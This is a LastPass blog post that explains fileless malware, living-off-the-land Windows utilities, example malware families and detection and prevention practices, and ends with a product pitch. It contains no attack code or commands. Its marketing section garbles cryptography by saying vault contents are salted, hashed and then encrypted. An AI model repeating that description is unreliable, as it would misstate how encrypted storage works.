Try Business for freedownload
Blog
Recent
Blog
Recent
Industry News
LastPass For Admins
LastPass Labs
Product Updates
Tips And Tricks
bg
Security Tips

Understanding Fileless Malware

LastPassSeptember 04, 2024
Understanding Fileless Malware

It all started with a simple dropper injection nobody noticed. In February 2022, attackers used Windows event logs to unload a “fileless” malware campaign on unsuspecting users. 

It was the first time attackers turned event logs (a defensive tool for incident analysis) into part of the attack surface. 

The dropper “carried” two late-stage Trojans with remote control and lateral movement capabilities. Although not strictly fileless malware, the Trojans were executed from shellcode in event logs, which is a fileless technique. 

Today, new variations of fileless malware continue to evade detection – and the question begs to be asked: is there a way to stop them? 

Below, we explain what fileless malware is and how you can protect your business from it. 

What is Fileless Malware? 

Definition of fileless malware 

“What’s fileless malware?” and “What’s the difference between fileless and traditional file-based malware?” are two questions we’re often asked on this topic.  

First, fileless malware is often called memory-resident malware. It's a type of malicious software that resides entirely in RAM memory. It doesn’t create executable files on your hard drive like traditional file-based malware -- it bypasses the file system entirely. 

This means fileless malware can easily evade traditional file-based antivirus detection tools, which makes it extremely dangerous. 

Fileless malware can also run on trusted scripts like PowerShell, VBScript, or Python.  

Fileless malware versus traditional malware 

So, how common is fileless malware? 

It’s becoming increasingly common, if the numbers are any indication. 

Fileless malware attacks are 10 times more likely to succeed than traditional file-based malware attacks. In addition, fileless attacks increased 1,400% in 2022. 

According to ReliaQuest (creator of the GreyMatter open XDR platform), 86.2% of the critical customer incidents it responded to in 2023 involved fileless malware. 

And many of them used the LOTL (Living Off the Land) technique to advance an attack. 

Which brings us to another important question, “What are fileless malware attacks and Living Off the Land?” 

As mentioned, fileless malware attacks execute from memory or trusted scripts. They leave no traces and belong to the category of low-observable characteristic (LOC) attacks

Many of the fileless malware intrusions ReliaQuest intercepted used Living off the Land (LotL) techniques, abusing legitimate Windows utilities such as rundll32, cmd.exe, msiexec, WMIC.exe, and certutil.exe. These utilities are also called LOLBins – and no, they aren’t trash cans with laughing faces. 

Instead, LOLBins are Windows utilities used for system administration or maintenance. They are often Microsoft-signed binaries attackers exploit to hide their malicious actions. 

Characteristics and behaviors of fileless malware 

So, where is fileless malware stored and how does it evade detection? 

Fileless malware can hide in the Windows registry and utilize scripts to execute its malicious payload. Attackers exploit these LOLBin scripts because they enable the execution of complex operations without creating files on disk.  

Fileless malware generally enters a system through phishing emails or malicious attachments (more on this later).  

Once inside, it can make lateral movements, exfiltrate data, gain elevated privileges, and perform other covert actions without anyone the wiser. Three LOLBins were involved in 92% of fileless malware attacks detected by ReliaQuest in 2023: rundll32 (59%), msiexec (29%), and mshta (4%). 

Examples of fileless malware 

Examples of fileless malware include: 

  • Code Red, which was one of the first fileless malware variants. It infected 350,000 servers in 2001. 
  • Pyloose, which attaches itself to Python code to install cryptocurrency miners in cloud environments 
  • DarkWatchman, which targeted individuals in the finance, transport, energy, and software security industries in Estonia, Latvia, Kazakhstan, and Russia 
  • Poweliks, which uses JavaScript and PowerShell code to infect systems 
  • Kovter, an extremely persistent fileless type that uses mshta.exe to execute  
  • Panda Stealer, a cryptocurrency-stealing malware which spreads via Discord 

How Does Fileless Malware Work? Common Techniques 

Script-based techniques employed by fileless malware 

Fileless malware often uses scripting languages like PowerShell, VBScript, and JavaScript to execute malicious code. 

PowerShell is a favorite target because it’s highly trusted in IT environments.  

Attackers may embed PowerShell commands in email attachments. When these attachments are opened, the scripts execute from memory, downloading and running malicious payloads. 

Memory-based attacks and fileless persistence methods 

Memory-based attacks are executed directly from RAM memory. These attacks exploit vulnerabilities in the operating system to inject malicious code into the memory space of legitimate processes.  

For example, a reflective DLL injection attack involves injecting a Dynamic Link Library (DLL) into the memory of the targeted process. It bypasses traditional Windows DLL loading mechanisms, allowing this type of fileless attack to evade detection. 

Fileless malware leveraging legitimate system tools 

Attackers often embed code in registry keys and launch payloads through legitimate processes in the Windows registry.  

For example, the DarkWatchman malware is a RAT (Remote Access Trojan) that uses the Windows registry to execute fileless payloads. This JavaScript RAT has keylogging capabilities; it can capture keystrokes, systems info, and clipboard data. 

When an unsuspecting user clicks on what they think is a legitimate link in their email, they are sent to a phishing website. Once there, they are prompted to download a file called “CSPSetup.rar.” 

Upon extraction, two files are available. The first, aCSPSetup.exe file, installs the DarkWatchman malware if executed. Meanwhile, the second is a Russian language readme.txt, which implies that the main target are Russian citizens. 

Impacts of Fileless Malware on Organizations 

Financial and reputational risks associated with fileless attacks 

The financial and reputational damage from a fileless malware attack can be devastating. 

A significant portion of consumers will immediately lose trust in a brand after such an attack: 

  • 66% of consumers won’t trust a business that falls victim to a data breach 
  • 44% of consumers think it’s the company’s fault when an attack happens 

Meanwhile, 57% of consumers would stop spending money with their favorite brand if it experienced an attack, and a whopping 70% think it’s the company’s responsibility to protect them from phishing campaigns. 

Any loss of trust can lead to decreased sales and market share. Unfortunately, this adds to the financial impact from costs associated with mitigation response, system recovery, and ransomware demands. According to IBM, the cost of a data breach in 2024 is $4.88 million. 

Finally, regulatory fines and legal fees may be severe enough to precipitate bankruptcy proceedings. 

Industries and sectors targeted by fileless malware 

Certain industries and sectors are particularly attractive to attackers who perpetrate fileless malware attacks. They include: 

  • Retail. The Prilex malware targets POS (Point-of-Sale) systems and ATMs to prevent NFC (Near Field Communication) contactless payments. 
  • Government & Education. These two industries are prime targets for attackers due to the critical and sensitive nature of their duties. Fileless attacks that deploy ransomware are growing – with colleges and government agencies paying the highest amounts ($6.6 million at last count). 
  • Healthcare. This industry is another favorite target, due to the PII (personally identifiable information) and medical data it holds. According to the HIPAA Journal, healthcare data breaches increased 8.4% from Q1 2023 to Q1 2024. The recent Change Healthcare breach will cost its parent company UnitedHealth between $2.3 billion (about $7 per person in the US) and $2.45 billion (about $8 per person in the US) in 2024.  
  • Financial services. Attackers continue to focus on this industry, due to the potential for direct financial gain. Fileless attacks that deploy banking trojans have stolen millions from financial institutions since 2011. 

Importance of cybersecurity awareness and employee training 

Given the sophisticated nature of fileless malware attacks, cybersecurity awareness and employee training are more important than ever. Businesses should prioritize: 

  • Simulated training in the form of mock phishing campaigns to help identity gaps in employee awareness 
  • Updated security policies regarding access controls and data handling procedures 

Stages of a Fileless Attack 

Initial infiltration and delivery methods of fileless malware 

In this section, we’ll answer two important, interconnected questions:  

  • How does fileless malware spread or propagate within a network?  
  • What are the stages of a fileless malware attack?  

One of the most popular infiltration methods is phishing emails.  

The following is an example of how a fileless attack may commence. 

First, the recipient is tricked into downloading an attachment, which then executes an embedded script.  

The script invokes a Windows utility called certutil.exe, which then downloads a PowerShell script from the attacker’s server.  

This PowerShell script embeds code in the victim’s Windows registry that automatically executes upon a systems reboot.  

When the user fires up their laptop the next morning, the PowerShell script deploys infostealer malware to the device. 

Unless the victim has the right proactive and reactive tools in place, they are likely to become another cybercrime statistic. 

Other infiltration and delivery methods include: 

  • Drive-by download techniques like exploit kits, a favorite vector for launching fileless attacks because they can be injected directly into the target system’s memory 
  • Watering holes (another drive-by download variant). Recently, Chinese APT (Advanced Persistent Threat) group Daggerfly deployed a watering hole attack that compromised pro-democracy websites in Hong Kong. When visitors accessed those websites, their devices were infected with iOS and macOS exploits that deployed a backdoor for collecting audio streams, screen captures, and other sensitive data. 

Execution and exploitation techniques used in fileless attacks 

APT attacks are growing in popularity. To date, there are 138 APT groups tracked by MITRE (a not-for-profit organization offering comprehensive threat information). Their tactics, techniques, and procedures (TTPs) continue to become even more sophisticated with the passing of time.  

Modern fileless attacks now employ a multi-stage approach, with the use of scripts, memory injections, and LOTL (Living Off the Land) techniques. These techniques will dramatically increase credential-based attacks and Access-as-a-Service schemes, where brokers sell direct access to stolen credentials to other threat actors. 

In 2022, the Multi-State Information Sharing and Analysis Center predicted that fileless malware and LOTL attacks would rise by more than 50%, matching the frequency of file-based attacks for the first time. 

Potential damage caused by fileless malware 

Over 91% of ransomware attacks in recent years incorporated fileless techniques, making them more difficult to detect. 

And YOUR credentials are the prize. 

By stealing credentials, fileless malware compromises your personal and financial information, leading to significant risks of identity theft.  

How bad is it? 

In July 2024, mobile security firm Zimperium discovered that attackers had deployed 100+ malware Android apps to steal one-time passwords across 600 global brands. The victims number in the millions across 113 countries. 

Meanwhile, identity theft reports comprise 1.4 million out of the 5.7 million fraud cases the FTC has handled so far in 2024.   

Detecting and Preventing Fileless Malware 

Signs and indicators of a fileless malware infection 

By now, you may be wondering, “How can I detect fileless malware?” 

There are several key indicators to watch for:  

  • PowerShell scripts may be executed from unknown sources. 
  • Frequent crashes and lags in performance occur with an unsettling regularity. 
  • High memory usage may indicate an infection, since fileless malware resides in RAM. 
  • In some cases, fileless malware may be delivered through malicious macros in documents like this VBA macros.  

Effective detection strategies and tools for fileless attacks 

How can fileless malware be prevented? 

These five key strategies can dramatically reduce your chances of a successful fileless malware attack: 

  • Enforce Zero Trust principles like least privilege to prevent lateral movements across your network. The NSA recommends privileged access management tools with strong authentication mechanisms. Monitoring privileged access is key because attackers continue to target high-level credentials with elevated permissions as a means of moving laterally through a system. 
  • If you’re using Windows 10 or newer, Microsoft Defender for Endpoint comes with AMSI (Anti-Malware Scan Interface). AMSI can inspect PowerShell scripts for anomalies, detect and mitigate WMI persistence techniques, and identify reflective DLL injection attacks. 
  • Attackers use Mimikatz to extract passwords, PIN codes, Kerberos tickets, and other types of credentials from a system’s memory. Because attackers use a fileless method to load Mimikatz into memory, they can make lateral moves and maintain persistence without fear of detection. To protect your business, you’ll want to deploy comprehensive threat intelligence software that lets you investigate any endpoint in the cloud or on-prem environments. 
  • Implement application allowlisting according to CISA guidelines to prevent Living off the Land attacks. Allowlisting permits only authorized programs and apps to run. This creates a default Zero Trust environment, where any program not authorized to run is automatically prevented from executing. 
  • Enforce robust identity access management controls and implement phishing-resistant MFA (multi-factor authentication) for privileged accounts – as recommended by CISA. 

According to CISA, these best practices provide the best defense against fileless malware attacks: 

  • Behavioral analytics: AI and ML-powered behavioral analytics identifies deviations from standard behaviors as potential Indicators of Attack (IOA). IOAs are proactive, unlike the more reactive IOCs (Indicators of Compromise). However, both IOAs and IOCs provide a more robust approach to preventing LOTL attacks.  
  • Endpoint detection and response (EDR): LOTL attacks often avoid triggering legacy EDRs because of the assumed safety of LOLBins. To bolster EDR defenses, you’ll want to consider next-gen XDR (Extended Detection & Response) tools that monitor data beyond your endpoints to accommodate your entire technology stack.  
  • Network segmentation & SIEM traffic analysis: Proper segmentation limits lateral movements by threat actors. In addition, SIEM tools can help aggregate log data, preventing attackers from modifying or compromising event logs. As mentioned at the beginning of this article, threat actors have begun weaponizing event logs for LOTL attacks. 
  • Memory forensics: Leading-edge memory forensic tools like Volatility analyzes volatile RAM memory data to detect anomalies that fly under the radar of traditional file-based forensics. This is useful for identifying LOTL attacks, which leave no traces on disk. Volatility provides deep memory scans and looks for instances of DLL code injections. 

How LastPass Protects Against Fileless Malware 

Integration of security features to combat fileless attacks 

As the world transforms around us, LastPass is ready with cutting-edge security features that help you fight back against fileless malware attacks. Here’s what we offer: 

  • AES-256 encryption, salting, and SHA-256 hashing. The contents of your password vault are first salted, then hashed with SHA-256, and finally encrypted with AES-256 before storing. Even if fileless malware infects your RAM, your encrypted vault remains unreadable to attackers. 
  • Our phishing-resistant MFA is a powerful solution against fileless malware that diverts you to malicious websites. 
  • Enjoy push-button convenience with LastPass Autofill, which allows you to populate forms without opening your vault. This reduces the risk of keylogging attacks that capture your credentials, a popular attack technique by fileless malware threat actors. 

Securing privileged access and preventing data breaches 

You may have heard strong passwords are your secret weapon against malware attacks. 

However, coming up with secure passwords after you’ve ploughed through the NIST four-volume tome on digital identity is about as exciting as reading the terms and conditions before a purchase – it's important but you’d rather be doing something else. 

At LastPass, our game-changing Password Generator removes the stress of generating strong passwords by doing it for you.  

LastPass also integrates with PAM (privileged access management) tools like AD FS (Active Directory Federation Services) to manage access to sensitive business assets. By ensuring only authorized users can access privileged information, the risk of fileless malware moving laterally to compromise high-value targets is minimized. 

Our integration with AD FS also supports MFA and federated single-sign-on (SSO). So, you only need one set of credentials to securely access resources across organizations and domains. 

Mitigating the risks of fileless malware 

CISA recommends several key hardening practices for mitigating the risks of fileless malware. Among them are: 

  • Applying industry or government standards for strengthening software and system configurations 
  • Regularly patching and updating operating systems and apps, especially for Windows, macOS, and Linux environments 
  • Applying minimum viable secure configuration baselines for Microsoft 365 and Google Workspace cloud environments 
  • Securing critical assets by applying vendor-specific hardening measures, especially for AD FS and AD CS 
  • Applying write-once, read-many storage for logs to prevent tampering with event logs 
  • Enabling phishing-resistant MFA and a robust PAM solution to ensure privileged access is granted only when required and for a limited duration 

It’s undeniable that the dangers far outweigh the option of waiting to implement the strategies described above. 

Start protecting your intellectual property and trade assets today by signing up for a free LastPass Business trial.  

bg

Get started with LastPass Business

14-day free LastPass Business trial. No credit card required.